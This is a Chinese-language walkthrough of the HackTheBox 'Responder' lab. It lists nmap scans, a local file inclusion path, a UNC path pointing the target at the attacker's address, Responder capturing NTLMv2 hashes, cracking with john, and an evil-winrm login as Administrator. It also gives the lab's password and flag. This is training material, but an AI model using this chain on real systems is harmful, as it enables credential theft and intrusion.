前言
还是速通,直接给大家上解题思路。这台靶机侧重使用responder工具通过黑化kali获取hash。
靶机提供
准备
目标靶机
网络连通
题目已披露的漏洞环境
实战攻击
任务一
unika.htb
任务二
直接上nmap扫服务,试试看能否爆出来。
nmap -sV -T4 10.129.253.226
可以看到这里能爆出来。
也可以使用burp suite抓包来获取
php
尝试修改hosts文件禁止这种跳转,以kali为例,首先编辑/etc/hosts文件,添加一下IP地址和跳转的地址。
vim /etc/hosts
这样再次访问就有页面出来了。
任务三
在页面中随机翻找,找到交互按钮。
点开后有个灰色的交互按钮,双击后就跳转到了这个站点。
http://unika.htb/index.php?page=german.html
观察页面的前端属性,发现没有变化,站点后缀变为了.html,所以将重点转移到站点路径上,盲猜单词page可以切换语言版本,直接提交,通过。
page
任务四
这一题是选择题,笨方法是直接一个个接着提交就能过。
第三个选项更符合本地文件包含漏洞的构造特征
../../../../../../../../windows/system32/drivers/etc/hosts
任务五
还是选择题,数值为somefile
//10.10.14.6/somefile
任务六
度娘:New Technology LAN Manager
New Technology LAN Manager
任务七
responder 这个工具会回答发出的LLMNR和NBT-NS查询,诱使受害者主机提供Net-NTLM哈希。该工具一般只针对SMB的文件服务器服务请求。kali系统中内置。
responder --help
查询一下应用参数
-I
任务八
度娘:john the ripper 可以用来破解NTLM的哈希。
john the ripper
任务九
使用responder工具进行获取NTLMv2哈希。
responder常用参数
-I 设置监听的网络接口,eth0
-f 收集NBT_NS或LLMNR的信息
-w 设置WPAD服务器
使用responder监听本地tun0网卡
Rsponder - I tun0
#tun0网卡为openvpn的虚拟网卡
然后靶机的地址访问本地的地址,注意访问的是本地的地址,就是openvpn获取到的地址
抓取到哈希
放入john破解
john responder
或者将hash值复制出来,写入txt文档,再丢入john破解。
john破解hash的过程有点久................
取决于你的kali虚拟机的性能。
cpu都跑满了。
经过漫长的等待,也是跑出来了
管理员用户的密码:badminton
badminton
任务十
度娘:5985
5985
任务十一
自由题来了,先整合前面获取到的所有信息,该服务器存在本地文件包含漏洞,信息泄露,密码抓取,获取到了管理员用户名和密码。
使用nmap对靶机进行一次重扫,查看运行的服务。
nmap -sV -p- 10.129.253.226
结合上题的远程访问responder计算机的侦听端口。直接使用红队神器evil-winrm进行连接测试。
具体使用方法:>>>红队神器evil-winrm的使用<<<
evil-winrm -i 10.129.253.226 -u Administrator -p badminton
成功连接。
使用cd命令回到根目录。
分析系统中的用户。
net user
发现一个名为mike的用户比较可疑,逐级进入查看。
开始查看目录下的文件和下级目录,在mike账户下的desktop目录下发现名为flag.txt的文件。
查看flag.txt文件,拿到flag值。
cat flag.txt
flag={ea81b7afddd03efaa0945333ed147fac}
靶机通关-试验结束
标签:responder,速通,..,Responder,flag,HackTheBox,任务,靶机,john From: https://blog.csdn.net/qq_73252299/article/details/139546765